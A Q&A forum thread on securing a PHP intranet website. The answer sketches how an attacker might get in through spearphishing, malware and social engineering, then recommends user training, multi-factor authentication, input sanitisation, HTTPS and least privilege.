PHP - Security what is best way?

Question

What is the best way to secure an intranet website developed using PHP from outside attacks?

Answer 1

That's a stunningly thought-provoking question, and I'm surprised that you haven't received better answers.

Summary

Everything you would do for an external-facing application, and then some.

Thought Process

If I'm understanding you correctly, then you are asking a question which very few developers are asking themselves. Most companies have poor defence in depth, and once an attacker is in, he's in. Clearly you want to take it up a level.

So, what kind of attack are we thinking about?
If I'm the attacker and I'm attacking your intranet application, then I must have got access to your network somehow. This may not be as difficult as it sounds - I might try spearphishing (targetting email to individuals in your organisation, containing either malware attachements or links to sites which install malware) to get a trojan installed on an internal machine.

Once I've done this (and got control of an internal PC), I'll try all the same attacks I would try against any internet application.

However, that's not the end of the story. I've got more options: if I've got one of your user's PCs, then I might well be able to use a keylogger to gather usernames and passwords, as well as watching all your email for names and phone numbers.
Armed with these, I may be able to log into your application directly. I may even learn an admin username/password. Even if I don't, a list of names and phone numbers along with a feel for company lingo gives me a decent shot at socially engineering my way into wider access within your company.

Recommendations

• First and foremost, before all technical solutions: TRAIN YOUR USERS IN SECURITY

The common answers to securing a web app:

• Use multi-factor authentication
  • e.g. username/password and some kind of pseudo-random number gadget.
• Sanitise all your input.
  • to protect against cross-site scripting and SQL injection.
• Use SSL (otherwise known as HTTPS).
  • this is a pain to set up (EDIT: actually that's improving), but it makes for much better security.
• Adhere to the principals of "Segregation of Duties" and "Least Priviledge"
  • In other words, by ensuring that all users have only the permissions they need to do their jobs (and nobody else's jobs) you make sure they have the absolute minimum ability to do damage.